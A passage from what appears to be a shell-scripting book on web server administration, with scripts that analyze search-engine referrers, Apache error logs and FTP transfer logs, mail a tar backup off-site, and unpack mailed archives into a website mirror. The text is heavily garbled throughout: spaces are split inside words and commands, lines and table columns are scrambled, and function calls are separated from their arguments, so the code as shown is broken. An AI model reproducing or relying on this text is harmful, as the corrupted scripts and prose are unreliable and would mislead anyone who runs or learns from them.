4 msn .c om:
the plain s in d i ans
4 msn .c om:
litt le bi g ho r n ba t t le fi el d
4 msn .c om:
Indi an Wa r s
4 goo gl e.c om :
n ewsgr o ups
3 yah oo .co m:
co ol we b pa g e s
3 itt oo lbo x. com
i=1 1 86"
3 goo gl e.i t:
ju ngle b ook k ipl i n g pl ot
3 goo gl e.c om :
c ool w e b g r a phi c s
3 goo gl e.c om :
c olore d bu l l ets C SS
2 yah oo .co m:
un ix%2B h ogs
2 yah oo .co m:
co ol HT M L t a g s
2 msn .c om:
www. custe r .co m
S ca nne d 46 6 ent ri es i n lo g fil e ou t of 1 1 40 6 to t al .

Hacking the Script


You can tweak this script in a variety of ways to
are (most likely) not from search engines. To do
i f [ ! - z "$a rg s" ] ; t hen
ec h o " ${ sea rc heng ine} :
e lse
# N o w el l-k no wn m atch , sho w
ec h o " ${ sea rc heng ine}
fi

make it more useful. One obvious one is to skip the referrer URLs that
so, simply comment out the e l se clause in the following passage:
$a r g s" > > $ te mp
en t i re G E T st ri n g in s te a d. ..
$( e c ho $ U RL | c u t -d \ ? - f2 )" >> $ t em p

To be fair, ex post facto analysis of search engine traffic is difficult. Another way to approach this task would be to
search for all hits coming from a specific search engine, entered as the second command argument, and then to

compare the search strings specified. The core f o r loop would change, but, other than a slight tweak to the usage
message, the script would be identical to the s ear c h inf o script:
f or UR L in $ (aw k '{ i f (l ength ( $11 ) > 4 ) { pr in t $ 11 } } ' "$ 1 " | \
g rep $2)
do
a rgs = "$( ec ho $U RL | cut -d\? -f2 | tr ' &' ' \n ' | \
g r ep -E '( ^q =|^s id=| ^p=|q u ery = | ite m = |a sk =| n am e= | to p ic =) ' | \
c u t - d= -f 2) "
e cho $ar gs | se d -e 's/ +/ /g ' -e ' s/" / / g' > > $ te mp
c oun t ="$ (( $co un t + 1))"
d on e
The results of this new version, given g oogle . com as an argument, are as follows:
$ e ngi n ehi ts /w eb /log s/in tuiti v e/a c c ess _ l og g oo g le .c o m
S ea rch eng in e r ef erre r in fo ex t rac t e d g o o gl e se a rc he s f r om
/ we b/l o gs/ in tui ti ve/a cces s_log :
13 coo l web p ages
10
9 htm l 4 e nt itie s
4 new sg rou ps
3 sol ar is 9
3 jun gl e b oo k ki plin g plo t
3 int ui tiv e
3 coo l web g raph ics
3 col or ed bu llet s CS S
2 sun s ola ri s op erat ing s y ste m rea d i ng m at e ri al
2 sol ar is un ix
2 mil it ary w eapo nry
2 how t o a dd pro gram to s u n s o l ari s me nu
2 dyn am ic ht ml b orde r
2 Wal lp ape r Niko n
2 HTM L for h eart sym bol
2 Coo l web p ages
2 %22 Mi lit ar y we apon ry%22
1 www %2 fvo ic es.c om
1 wor st ga ra ge d oor opene r
1 wha ti s a rt sd
1 wha t% 27s m eta tag
S ca nne d 23 2 goo gl e en trie s in l og f i le o u t of 1 1 48 1 t ot a l.
If most of your traffic comes from a few search engines, you could analyze those engines separately and then list all
traffic from other search engines at the end of the output.

#86 Exploring the Apache error_log


Just as Script #84, Exploring the Apache access_log, reveals the interesting and useful statistical information found in
the regular access log of an Apache or Apache-compatible web server, this script extracts the critical information from
the erro r_l og .
For those web servers that don't automatically split their log file into separate a c ce ss _ lo g and er ro r _l o g
components, you can sometimes split a central log file into access and error components by filtering based on the
return code (field 9) of each entry in the log:
aw k '{ if ( sub st r($ 9,0 ,1) <= "3") { p r i n t $ 0 } }' ap a ch e. l og > a cc es s _l o g
aw k '{ if ( sub st r($ 9,0 ,1)
> "3") { p r i n t $ 0 } }' ap a ch e. l og > e rr or _ lo g
A return code that begins with a 4 or a 5 is a failure (the 400s are client errors, the 500s are server errors), and a
return code beginning with a 2 or a 3 is a success (the 200s are success messages, the 300s are redirects):
Other servers that produce a single central log file containing both successes and errors denote the error message
entries with an [er ro r] field value. In that case, the split can be done with a gr ep '[ e rr o r] ' to create the
er ror_ log and a gre p -v '[e rror ]' to create the acc e s s_ lo g .
Whether your server automatically creates an er ro r _ log or you have to create your own error log by searching for
entries with the '[e rro r] ' string, in the error log just about everything is different, including the way the date is
specified:
$ head -1 err or _lo g
[T hu J an
2 1 0: 07: 07 2003 ] [ erro r ] [ c l i ent 20 8 .1 8 0. 3 1. 24 4 ] F il e d oe s
no t ex ist: /u sr /lo cal /etc /ht tpd/ h tdo c s / int u it i ve / fa v ic on . ic o
In the ac ces s_ log , dates are specified as a compact one-field value with no spaces, but the e rr or _ lo g takes
five fields instead. Further, rather than a consistent scheme in which the word/string position in a space-delimited entry
consistently identifies a particular field, entries in the e r ror _ l og have a meaningful error description that varies in
length. An examination of just those description values reveals surprising variation:
$ awk '{pr int $ 9" "$1 0" " $11 " "$ 1 2 } ' e rro r _l o g | s o rt - u
Fi le d oes not e xis t:
In vali d er ror r edi rec tion di rect i ve:
Pr emat ure end o f s cri pt
ex ecut ion fai lu re for par ame ter
pr emat ure EOF i n p ars ed
sc ript not fo un d o r
ma lfor med hea de r f rom scr ipt
Some of these errors should be examined by hand because they can be difficult to track backward to the offending
web page once identified. Others are just transient problems:
[T hu J an 1 6 2 0: 03: 12 2003 ] [ erro r ] [ c l i ent 20 5 .1 8 8. 2 09 .1 0 1] (3 5 )
Re sour ce t emp or ari ly unav ail able : co u l d n't sp a wn in c lu de co m ma n d
/u sr/h ome/ tay lo r/w eb/ intu iti ve/l i bra r y / hea d er . cg i : C an no t f o rk :
Re sour ce t emp or ari ly unav ail able
This script focuses on the most common problems in particular, File does not exist errors and then produces a
dump of all other er ror _l og entries that don't match well-known error situations.

The Code
#! /bin /sh
# webe rror s - S can s t hrou gh an A p ach e e rro r _l o g f il e a nd re p or t s th e
#
m ost imp or tan t e rror s, then lis t s add i ti o na l e n tr ie s .
te mp=" /tmp /$( ba sen ame $0) .$$ "
# The foll owi ng th ree lin es will nee d t o b e c u st o mi z ed f o r y ou r o wn
# inst alla tio n for th is s cri pt t o wo r k bes t .
ht docs ="/u sr/ lo cal /et c/ht tpd /htd o cs/ "
my home ="/u sr/ ho me/ tay lor/ "
cg ibin ="/u sr/ lo cal /et c/ht tpd /cgi - bin / "
se dstr ="s/ ^/

/ g;s |$h tdoc s|[ htdo c s]

| ; s|$ m yh o me | [h o me di r ] | ;s | $c gi b in | [c g i- bi n] |"

sc reen ="(F ile d oes no t ex ist |Inv a lid e r ror re d ir e ct | pr em a tu r e E OF |P r em a tu r e en d of


sc ript |scr ipt n ot fou nd)"
le ngth =5
# en trie s pe r c ate g or y t o d i sp la y
ch eckf or()
{
grep "${ 2}: " "$1 " | awk '{ prin t $N F } ' |\
so rt | un iq -c | sort -r n | h ead - $ len g th | s ed "$ se d st r " > $ te m p

if [ $(w c - l < $ tem p) - gt 0 ] ; th e n


ec ho " "
ec ho " $2 er ror s:"
ca t $t emp
fi

tr ap " /bin /rm - f $ tem p" 0


if [ " $1" = " -l " ] ; then
leng th=$ 2; sh ift 2
fi
if [ $ # -n e 1 - o ! -r "$1 " ] ; t h en
echo "Us age : $(b ase name $0 ) [- l le n ] err o r_ l og " > & 2
exit 1
fi
ec ho I nput fi le $1 ha s $( wc -l < "$1 " ) ent r ie s .
st art= "$(g rep - E ' \[. *:.* :.* \]' " $1" | hea d - 1 | aw k ' {p r in t $ 1 " "$ 2 " " $3 " " $4 " "$5
}' )"
en d="$ (gre p - E '\[ .*: .*:. *\] ' "$ 1 " | t a il - 1 | a w k ' {p ri n t $ 1" "$ 2" "$ 3 " " $4 " "$5
}' )"
ec ho - n "E ntr ie s f rom $st art to $ end "
ec ho " "
## # Ch eck for v ari ous com mon and wel l - k now n e r ro r s:
ch eckf or
ch eckf or
ch eckf or
ch eckf or
ch eckf or

" $1"
" $1"
" $1"
" $1"
" $1"

" Fil e d oes not exi s t"


" Inv ali d er ror red i rec t i o n d i re c ti v e"
" pre mat ure EOF "
" scr ipt not fo und o r u n a b le t o s ta t "
" Pre mat ure end of s cri p t hea d er s "

gr ep - vE " $sc re en" "$ 1" | gr ep " \ [er r o r \]" | g re p " \ [c li e nt " | \
sed 's/\ [er ro r\] /\` /' | cu t -d \ ` - f 2 | c u t - d\ -f 4 - | \
sort | u niq - c | so rt - rn | se d 's / ^ / /' | h ea d - $ le ng t h > $ t em p
if [ $ (wc -l < $te mp) -gt 0 ] ; t hen
echo ""
echo "Ad dit io nal er ror mes sage s in l o g f i le : "
cat $tem p
fi
ec ho " "
ec ho " And non -e rro r m essa ges occ u rri n g in t he lo g f i le :"
gr ep - vE " $sc re en" "$ 1" | gr ep - v "\ [ e r ror \ ]" | \
sort | u niq - c | so rt - rn | \
sed 's/^ / / ' | h ead -$l eng th
ex it 0

How It Works
This script works by scanning the err or_ log for the five errors specified in the calls to the c h ec kf o r function,
extracting the last field on each error line with an a w k call for $ N F (N F represents the number of fields in that
particular input line). This output is then fed through the common s o r t | u ni q -c | so r t -r n sequence to allow
the extraction of the most commonly occurring errors for that category of problem.

To ensure that only those error types with matches are shown, each specific error search is saved to the temporary
file, which is then tested for contents before a message is output. This is all neatly done with the c he c kf or function
that appears near the top of the script.
The last few lines of the script are perhaps the most complex. First they identify the most common errors not otherwise
checked for by the script that are still in standard Apache error log format. The following g r ep invocations are part of
a longer pipe:
gr ep - vE " $sc re en" "$ 1" | gr ep " \ [er r o r \]"
Then the script identifies the most common errors not otherwise checked for by the script that don't occur in standard
Apache error log format. Again, the following gre p invocations are part of a longer pipe:
gr ep - vE " $sc re en" "$ 1" | gr ep - v "\ [ e r ror \ ]"

Running the Script


This script should be fed a standard Apache-format error log as its only argument. If invoked with an - l l e ng th
argument, it'll display len gth number of matches per error type checked rather than the default of five entries per
error type.

The Results
$ webe rror s e rr or_ log
In put file er ro r_l og has 104 0 en t rie s .
En trie s fr om [S at Aug 23 18: 10:2 1 20 0 3 ] to [S a t A ug 30 1 7 :2 3 :3 8 2 00 3 ]
Fi le d oes not e xis t e rror s:
24 [ht doc s]
i ntu itiv e/c oolw e b/G r a p hic s /G r ap h ic s /o ff . gi f
19 [ht doc s]
i ntu itiv e/t aylo r /Gr a p h ics / bi o ha z ar d .g if
19 [ho med ir ] p ubl ic_h tml /tyu / tyu - t o c.h t ml
14 [ht doc s]
i ntu itiv e/G raph i cs/ b o t tom - me n u. g if
12 [ht doc s]
i ntu itiv e/t mp/r o se- c e r emo n y/ s pa c er . gi f
In vali d er ror r edi rec tion di rect i ve e r r ors :
23 ind ex. ht ml
sc ript
55
4
4
3

not fo un d
[ht doc s]
[ht doc s]
[cg i-b in ]
[ht doc s]

o r u nabl e t o st a t e r r o rs:
i ntu itiv e/c oolw e b/a p p s /en v .c g i
i ntu itiv e/c gi-l o cal / a p ps/ e nv . cg i
F orm Mail .pl
i ntu itiv e/o rigi n s/p l a y gam e .c g i

Ad diti onal er ro r m ess ages in log fil e :


5 (35 )Re so urc e t empo rar ily u nav a i l abl e : c ou l dn ' t sp a wn in c lu de co m ma n d
4 unk now n par ame ter "sr c" t o ta g i ncl u de in
/u sr/l ocal /et c/ htt pd/ htdo cs/ intu i tiv e / t mp/ E CR 0 80 3 b. s ht ml
4 exe cut io n f ail ure for par a met e r "cm d " t o t ag ex ec in fi l e
/u sr/l ocal /et c/ htt pd/ htdo cs/ intu i tiv e / l ibr a ry / fo o te r .s ht m l
1 exe cut io n f ail ure for par a met e r "cm d " t o t ag ex ec in fi l e
/u sr/l ocal /et c/ htt pd/ htdo cs/ intu i tiv e / l ibr a ry / Wi n dW i ll ow s .s h tm l
An d no n-er ror m ess age s oc cur ring in t h e lo g f i le :
39 /us r/h om e/t ayl or/w eb/ intu i tiv e / l ibr a ry / he a de r .c gi : C a nn o t fo r k: Re s ou rc e
te mpor aril y u na vai lab le
20 ide nti fy : M iss ing an imag e fi l e nam e .
17 sor t: -: wr ite err or: Bro k en p i p e
16 /we b/b in /la stm od: not fou n d
16 /we b/b in /co unt er: not fou n d

#87 Avoiding Disaster with a Remote Archive


Whether or not you have a good backup strategy, with tape rotation and so forth, it's still a nice insurance policy to
identify a half-dozen critical files and have them sent to a separate off-site archive system. Even if it's just that one key
file that contains customer addresses, invoices, or even email from your sweetheart, having an occasional off-site
archive can save your life when you least expect it.
This sounds more complex than it really is, because as you'll see in this script, the archive is just a file emailed to a
remote mailbox and could even be pointed to a Yahoo! or Hotmail mailbox. The list of files is kept in a separate data
file, with shell wildcards allowed therein. Filenames can contain spaces too, something that rather complicates the
script, as you'll see.

The Code
# !/ bin / sh
# r emo t eba ck up - Take s a list o f f i l es a n d di re c to ri e s,
#
b u ild s a s in gle arch ive, c omp r e sse d , t he n e ma il s i t o ff to a
#
r e mot e arc hi ve s ite for s a fek e e pin g . I t' s i nt en d ed to b e r un
#
e v ery n igh t for crit ical u ser f ile s , b ut n o t in t en d ed t o
#
r e pla ce a mo re r igor ous b a cku p sch e m e. Y ou sh ou l d s tr on g ly
#
c o nsi de r u si ng u npac ker, S cri p t #8 8 , o n th e r em o te en d t oo .
u ue nco d e=" /u sr/ bi n/uu enco de"
o ut fil e ="/ tm p/r b. $$.t gz"
o ut fna m e=" ba cku p. $(da te + %y%m% d ).t g z "
i nf ile = "/t mp /rb .$ $.in "
t ra p " / bin /r m - f $out file $inf i le" 0
i f [ $ # -n e 2 - a $# - ne 3 ] ; t hen
e cho "Us ag e: $( base name $0) b ack u p -fi l e -l is t r em ot e ad d r {t a rg et d ir }" >& 2
e xit 1
fi
i f [ ! -s "$ 1" ] ; th en
e cho "Er ro r: ba ckup lis t $1 i s e m p ty o r m is si n g" > & 2
e xit 1
fi
# S can ent ri es an d bu ild fixed inf i l e l i s t. T hi s e xp a nd s w il d ca rd s
# a nd e sca pe s s pa ces in f ilena m es w i th a ba ck sl a sh , p ro d uc in g a
# c han g e: "t his f ile" bec omes t his \ fil e so q uo t es a r e n ot n e ed ed .
w hi le r ead e ntr y; do
e cho "$e nt ry" | sed -e 's/ / \ \ / g ' >> $ in fi le
d on e < "$1 "
# T he a ctu al wo rk of buil ding t he a r chi v e , en co d in g i t, an d s en di n g it
t ar cz f - $( cat $ infi le) | \
$ uue n cod e $ou tf name | \
m ail -s "$ {3: -B acku p ar chive for $ (da t e )} " "$ 2 "
e ch o " D one . $(b as enam e $0 ) bac k ed u p th e fo ll ow i ng f i le s :"
s ed 's / ^/
/' $i nfil e
e ch o - n "a nd ma il ed t hem to $2 "
i f [ ! -z "$ 3" ] ; th en
e cho "wi th re qu este d ta rget d ire c t ory $ 3"
e ls e
e cho ""
fi
e xi t 0

How It Works
After the basic validity checks, the script processes the file containing the list of critical files, which is supplied as the
first command argument, to ensure that spaces embedded in its filenames will work in the w h il e loop (remember, by
default spaces delimit arguments, so without some additional help, the shell will think that "test file" is two arguments,
not one). It does this by prefacing every space with a backslash. Then it builds the archive with the primitive but useful
t ar command, which lacks the ability to read standard input for its file list and thus must be fed the filenames via a
c at invocation.
t ar cz f - $( cat $ infi le)
The tar invocation automatically compresses the archive, and uu e nc o de is then utilized to ensure that the resultant
archive data file can be successfully emailed without corruption. The end result is that the remote address receives an
email message with the uuencoded tar archive as an attachment. This should be a straightforward script.
Note The uu en cod e program wraps up binary data so that it can safely travel through the email system without
being corrupted. See man uuencode for more information.

Running the Script


This script expects two arguments: the name of a file that contains a list of files to archive and back up, and the
destination email address for the compressed, uuencoded archive file. The file list can be as simple as
$ c at f ile li st
* .s h
* .h tml

The Results
$ r emo t eba ck up fi leli st t aylor @ int u i tiv e . co m
D on e. r emo te bac ku p ba cked up t h e f o l low i n g fi le s :
*.s h
*.h t ml
a nd ma i led t hem t o ta ylor @intu i tiv e . com
A more sophisticated use of this script lets us tie it in to the system mirroring tool presented as Script #88, Mirroring a
Website, with the third argument specifying a target unpacking directory:
$ c d / w eb
$ r emo t eba ck up ba ckup list tayl o r@i n t uit i v e. co m m ir ro r
D on e. r emo te bac ku p ba cked up t h e f o l low i n g fi le s :
our e cop as s
a nd ma i led t hem t o ta ylor @intu i tiv e . com w it h re q ue st e d t ar ge t
d ir ect o ry mi rro r

Hacking the Script


First off, if you have a modern version of tar, you might find that it has the ability to read a list of files from s t di n,
in which case this script can be shortened even further by updating how the file list is given to t a r (for example,
GNU's ta r has a -T flag to have the file list read from standard input).
The file archive can then be unpacked (as explored in Script #88, Mirroring a Website) or simply saved, with a mailbox
trimmer script run weekly to ensure that the mailbox doesn't get too big. Here's a sample trimmer script:
# !/ bin / sh
# t rim m ail bo x - A sim ple scrip t to e nsu r e t ha t o nl y t he fo ur mo st re ce n t
#
m e ssa ge s r em ain in t he us e r's m ail b o x. W or k s wi t h B er ke l ey M a il
#
( a ka Ma ilx o r ma il): will nee d mod i f ic at io n s fo r o t he r m ai le r s! !
k ee p=4

# by de fa ult, let 's ju s t k e e p a r o un d th e f ou r m o st r e ce nt me ss a ge s

t ot alm s gs= "$ (ec ho 'x' | m ail | sed - n ' 2 p ' | aw k ' {p r in t $ 2} ' )"
i f [ $ t ota lm sgs - lt $ keep ] ; t hen
e xit 0
# n othi ng to do
fi
t op msg = "$( ( $to ta lmsg s - $keep ))"

m ai l > /de v/ nul l << E OF


d 1- $to p msg
q
E OF
e xi t 0
This succinct script deletes all messages in the mailbox other than the $k e ep most recent ones. Obviously, if you're
using something like Hotmail or Yahoo! Mail for your archive storage spot, this script won't work and you'll have to log
in occasionally to trim things.

#88 Mirroring a Website


Large, busy websites like Yahoo! operate a number of mirrors, separate servers that are functionally identical to the
main site but are running on different hardware. While it's unlikely that you can duplicate all of their fancy setup, the
basic mirroring of a website isn't too difficult with a shell script or two.
The first step is to automatically pack up, compress, and transfer a snapshot of the master website to the mirror server.
This is easily done with the rem oteb ackup script shown in Script #87, invoked nightly by c ro n .
Instead of sending the archive to your own mail address, however, send it to a special address named un pa c ke r,
then add a s end ma il alias in /et c/al ia se s (or the equivalent in other mail transport agents) that points to the
u np ack e r script given here, which then unpacks and installs the archive:
u np ack e r:" |/ hom e/ tayl or/b in/ar c hiv e - unp a c ke r"
You'll want to ensure that the script is executable and be sensitive to what applications are in the default PA T H used
by s end m ail : The / var /l og/m essa ge s log should reveal whether there are any problems invoking the script
as you debug it.

The Code
# !/ bin / sh
# u npa c ker - Gi ve n an inp ut st r eam w ith a u ue nc o de d a rc h iv e f ro m
# t he r emo te arc hi ve s crip t, un p ack s and i ns ta ll s t he ar c hi ve .
t em p=" / tmp /$ (ba se name $0) .$$"
h om e=" $ {HO ME :-/ us r/ho me/t aylor } "
m yd ir= " $ho me /ar ch ive"
w eb hom e ="/ us r/h om e/ta ylor /web"
n ot ify = "ta yl or@ in tuit ive. com"
( c at - > $t emp # sho rtcu t to s ave s tdi n to a f i le
t arg e t=" $( gre p "^Su bjec t: " $ tem p | c u t - d\ - f 2- )"
e cho $(b as ena me $0) : Sa ved a s $t e m p, w i th $ (w c - l < $ t em p) li ne s
e cho "me ss age s ubje ct=\ "$tar g et\ " "
# Mo v e i nt o t he tem pora ry un p ack i n g d i r ec to ry . ..
i f [ ! - d $my di r ] ; th en
ec h o " Wa rni ng : ar chiv e dir $my d i r n o t f ou nd . U np a ck i ng i n to $ h om e"
cd $ho me
my d ir= $h ome
# for l ate r use
e lse
cd $my di r
fi
# Ex t rac t the r esul tant file n ame f rom t he u ue n co de d f i le .. .
f nam e ="$ (a wk '/ ^beg in / {pri n t $ 3 } ' $ t e mp )"
u ude c ode $ tem p
i f [ ! - z "$( ec ho $ targ et | g rep ' Bac k u p ar ch i ve f o r' ) " ] ; t he n
# A ll do ne. N o fu rthe r unp a cki n g ne e d ed .
ec h o " Sa ved a rchi ve a s $my d ir/ $ f nam e "
ex i t 0
fi
# Ot h erw is e, we hav e a uudec o ded f ile a nd a t a rg et di r ec to r y
i f [ "$( ec ho $t arge t|cu t -c1 ) " = " /" - o " $( ec h o $t a rg e t| cu t - c1 - 2) " = " .. " ]
t hen
ec h o " In val id tar get direc t ory $ tar g e t. C an ' t us e ' / ' or '. .' "
ex i t 0

fi
t arg e tdi r= "$w eb home /$ta rget"
i f [ ! - d $ta rg etdi r ] ; the n
ec h o " In val id tar get direc t ory $ tar g e t. C an ' t fi n d i n $w e bh om e "
ex i t 0
fi
g unz i p $ fn ame
f nam e ="$ (e cho $ fnam e | sed ' s /.t g z $/. t a r/ g' )"
# Ar e th e tar a rchi ve f ilena m es i n a v a li d fo r ma t?
i f [ ! - z "$( ta r tf $fn ame | awk ' {pr i n t $8 }' | gr e p ' ^/ ') " ] ; th en
ec h o " Ca n't u npac k ar chive : fi l e nam e s a re a b so lu t e. "
ex i t 0
fi
e cho ""
e cho "Un pa cki ng arc hive $fna m e i n t o $ t a rg et di r "
c d $ t arg et dir
t ar x vf $m ydi r/ $fna me | sed ' s/^ / /g'
e cho "do ne !"
) 2 >&1 | m ai l - s "Unp acke r out p ut $ ( dat e ) " $n ot i fy
e xi t 0

How It Works
The first thing to notice about this script is that it is set up to mail its results to the address specified in the n ot i fy
variable. While you may opt to disable this feature, it's quite helpful to get a confirmation of the receipt and successful
unpacking of the archive from the remote server. To disable the email feature, simply remove the wrapping parentheses
(from the initial ca t to the end of the script), the entire last line in which the output is fed into the mail program, and
the e cho invocations throughout the script that output its status.
This script can be used to unpack two types of input: If the subject of the email message is a valid subdirectory of the
w eb hom e directory, the archive will be unpacked into that destination. If the subject is anything else, the uudecoded,
but still compressed (with gzip), archive will be stored in the m y di r directory.
One challenge with this script is that the file to work with keeps changing names as the script progresses and
unwraps/unpacks the archive data. Initially, the email input stream is saved in $ t em p , but when this input is run
through u ude co de, the extracted file has the same name as it had before the uu en c od e program was run in
Avoiding Disaster with a Remote Archive, Script #87. This new filename is extracted as f n am e in this script:
f na me= " $(a wk '/ ^b egin / { print $3} ' $te m p )"
Because the tar archive is compressed, $f n ame is som e t hin g .t g z. If a valid subdirectory of the main web
directory is specified in the subject line of the email, and thus the archive is to be installed, the value of $ fn a me is
modified yet again during the process to have a .t a r suffix:
f na me= " $(e ch o $ fn ame | se d 's/ . tgz $ / .ta r / g' )"
As a security precaution, un pack er won't actually unpack a t a r archive that contains filenames with absolute paths
(a worst case could be /e tc /pas swd: You really don't want that overwritten because of an email message
received!), so care must be taken when building the archive on the local system to ensure that all filenames are
relative, not absolute. Note that tricks like .. / ../ . . /.. / e tc/ p as s wd will be caught by the script test too.

Running the Script


Because this script is intended to be run from within the lowest levels of the email system, it has no parameters and no
output: All output is sent via email to the address specified as n o ti f y.

The Results

The results of this script aren't visible on the command line, but we can look at the email produced when an archive is
sent without a target directory specified:
a rc hiv e -un pa cke r: Sav ed a s /tm p /un p a cke r . 38 19 8, wi th 10 8 1 li n es
m es sag e su bj ect =" Back up a rchiv e fo r Wed S ep 1 7 2 2: 48 : 11 GM T 2 00 3"
S av ed a rch iv e a s /hom e/ta ylor/ a rch i v e/b a c ku p. 03 0 91 8. t gz
When a target directory is specified but is not available for writing, the following error is sent via email:
a rc hiv e -un pa cke r: Sav ed a s /tm p /un p a cke r . 48 89 4, wi th 10 8 1 li n es
m es sag e su bj ect =" mirr or"
I nv ali d ta rg et di rect ory mirro r . C a n 't f i nd i n / we b
And finally, here is the message sent when everything is configured properly and the archive has been received and
unpacked:
a rc hiv e -un pa cke r: Sav ed a s /tm p /un p a cke r . 49 18 9, wi th 10 8 1 li n es
m es sag e su bj ect =" mirr or"
U np ack i ng ar chi ve bac kup. 03091 8 .ta r int o /w eb /m i rr or
o ure c opa ss /
o ure c opa ss /in de x.ht ml
o ure c opa ss /nq -m ap.g if
o ure c opa ss /nq -m ap.j pg
o ure c opa ss /co nt act. html
o ure c opa ss /ma il form .cgi
o ure c opa ss /cg i- lib. pl
o ure c opa ss /li st s.ht ml
o ure c opa ss /jo in list .cgi
o ure c opa ss /th an ks.h tml
o ure c opa ss /th an ks-j oin. html
d on e!
Sure enough, if we peek in the /web /mirr o r directory, everything is created as we hoped:
$ l s - R s / we b/m ir ror
t ot al 1
1 o ure c opa ss /
/ we b/m i rro r/ our ec opas s:
t ot al 6 2
4 cgi - lib .p l
2
2 con t act .h tml
2
2 ind e x.h tm l
20
2 joi n lis t. cgi *
26

lis t s.h t m l
mai l for m . cgi *
nq- m ap. g i f
nq- m ap. j p g

2 th a nk s -j oi n .h tm l
1 th a nk s .h tm l

#89 Tracking FTP Usage


If you're running an anonymous FTP server, you should already be constantly monitoring what happens in the
~ ft p/p u b directory (which is usually where uploads are allowed), but any FTP server requires you to keep an eye
on things.
The ftp daemon's transfer log (x ferl og) file format is definitely one of the most cryptic in Unix, which makes
analyzing it in a script rather tricky. Worse, there's a standard, common xf e rl o g file format that just about everyone
uses (and which this script expects), and there's an abbreviated ft pd .l o g format that some BSD versions of f t pd
use that's just about impossible to analyze in a script.
So we'll focus on the x fe rlog format. The columns in an x f er lo g are as shown in Table 10-2.
Table 10-2: Field values in the x ferl og file
Column

Value

15

Current time

Transfer time (secs)

Remote host

File size

Filename

10

Transfer type

11

Special action flag

12

Direction

13

Access mode

14

Username

15

Service name

16

Authentication method

17

Authenticated user ID

18-?

Additional codes as added by the specific f p td program (usually omitted)

A sample line from an x fe rlog is as cryptic as you might expect:


M on No v
4 1 2:2 2: 46 2 002 2 192 . 168 . 1 24. 1 5 2 21 70 5 70 \
/ ho me/ f tp/ pu b/o pe nssl -0.9 .5r.t a r.g z b _ i r l eo f tp 0 * c
This script quickly scans through x ferl og, highlighting connections and files uploaded and downloaded, and
producing other useful statistics.

The Code
# !/ bin / sh
# x fer l og - Ana ly zes and summa r ize s the F TP t ra n sf er lo g . A g oo d d oc
# d eta i lin g the l og f orma t is h ttp : / /ao l s er ve r. a m. ne t /d o cs /2 . 3/ ft p -c h4 . ht m.
s td xfe r log =" /va r/ log/ xfer log"
t em p=" / tmp /$ (ba se name $0) .$$"
n ic enu m ="$ HO ME/ bi n/ni cenu mber"
t ra p " / bin /r m - f $tem p" 0
e xt rac t ()
{

# Scr i p t #4

# Ca l led w ith $ 1 = desi red a c ces s m ode , $2 = s e ct io n n a me f o r ou t pu t


i f [ ! - z "$( ec ho $ acce ssmod e | g r ep $ 1 )" ] ; th en
ec h o " " ; e ch o "$ 2"
if [ " $1 " = " a" - o "$ 1" = " g" ] ; t h e n
e cho "
c om mon acco unt ( e nte r e d p a s sw or d) va lu e s: "
el s e
e cho "
u se r ac coun ts ac c ess i n g s e r ve r: "
fi
aw k "\ $1 3 = = \"$1 \" { prin t \$ 1 4 }" $ lo g | s or t | \
un iq -c | sor t -r n | h e ad - 1 0 | s ed ' s/ ^ /
/'
aw k "\ $1 3 = = \"$1 \" & & \$1 2 == \ "o\ " { pr in t \ $9 }" $l og | so r t | \
u niq - c | s ort -rn | hea d -1 0 | s e d ' s/ ^/
/ ' > $t em p
if [ - s $te mp ] ; the n
e cho " fi le s do wnlo aded f rom s erv e r :" ; c a t $t e mp
fi
aw k "\ $1 3 = = \"$1 \" & & \$1 2 == \ "i\ " { pr in t \ $9 }" $l og | so r t | \
u niq - c | s ort -rn | hea d -1 0 | s e d ' s/ ^/
/ ' > $t em p

fi

if [ - s $te mp ] ; the n
e cho " fi le s up load ed to ser v e r:" ; c at $ t em p
fi

# ## ### The m ain s crip t bl ock


c as e $ # in
0 ) l og= $s tdx fe rlog
;;
1 ) l og= "$ 1"
;;
* ) e cho " Usa ge : $( base name $ 0) { x fer l o g na me } " >& 2
e xit 1
e sa c
i f [ ! -r $l og ] ; th en
e cho "$( ba sen am e $0 ): c an't r ead $ log . " > &2
e xit 1
fi
# A sce r tai n whe th er i t's an ab b rev i a ted o r st an d ar d f tp lo g f il e f or ma t . If
# i t's the a bbr ev iate d fo rmat, out p u t s o m e mi ni m al s t at i st ic a l da t a an d q ui t :
# T he a bbr ev iat ed for mat is to o di f f icu l t t o an a ly ze in a sh o rt s c ri pt ,
# u nfo r tun at ely .
i f [ ! -z $( awk ' $6 = = "g et" { sho r t =1 } EN D{ p r in t s ho r t }' $l og ) ] ; th en
byt e sin =" $(a wk 'BE GIN{ sum=0 } $6 = = "ge t " { su m+ = $9 } E ND { pr in t s um } ' $l o g) "
b yte s out =" $(a wk 'BE GIN{ sum=0 } $6 = = "pu t " { su m+ = $9 } E ND { pr in t s um } ' $l o g) "

fi

e cho
e cho
e cho
e cho
e cho
e xit

-n "A bbr ev iate d ft pd xf e rlo g fro m "


-n $( hea d -1 $ log | awk '{p r i nt $ 1 , $2 , $ 3 }' )
" t o $(t ai l -1 $lo g | a w k ' { p rin t $1 , $2 , $ 3} ' )"
" b yt es in : $( $nic enum $ byt e s in) "
" b yt es ou t: $ ($ni cenum $by t e sou t ) "
0

by tes i n=" $( awk ' BEGI N{su m=0} $ 12= = " i" { s um + = $ 8} E N D{ pr in t s um }' $ l og ) "
b yt eso u t=" $( awk ' BEGI N{su m=0} $ 12= = " o" { s um + = $ 8} E N D{ pr in t s um }' $ l og ) "
t im e=" $ (aw k 'BE GI N{su m=0} {sum += $ 6 } E N D { pr in t s um }' $l og ) "
e ch o
e ch o
e ch o
e ch o
e ch o
e ch o

- n "S um mar y of x ferl og fr o m "


- n $( he ad -1 $lo g | awk ' { pri n t $1 , $2 , $3 , $ 4, $5 }' )
" to $( ta il - 1 $l og | a wk ' { pri n t $ 1, $ 2 , $3 , $ 4 , $5 } ') "
"
by te s in : $( $nice n um $ b yte s i n) "
"
by te s ou t: $ ($nic e num $ byt e s ou t) "
"
tr an sfe r time : $t ime s e con d s "

a cc ess m ode =" $(a wk '{p rint $13} ' $l o g | s o rt - u) "


e xt rac t "a " "An on ymou s Ac cess"
e xt rac t "g " "Gu es t Ac coun t Acc e ss"
e xt rac t "r " "Re al Use r Ac count Acc e s s"
e xi t 0

How It Works
In an x ferlo g, the total number of incoming bytes can be calculated by extracting just those lines that have
d ir ect i on= "i " and then summing up the eighth column of data. Outgoing bytes are in the same column, but for
d ir ect i on= "o ".
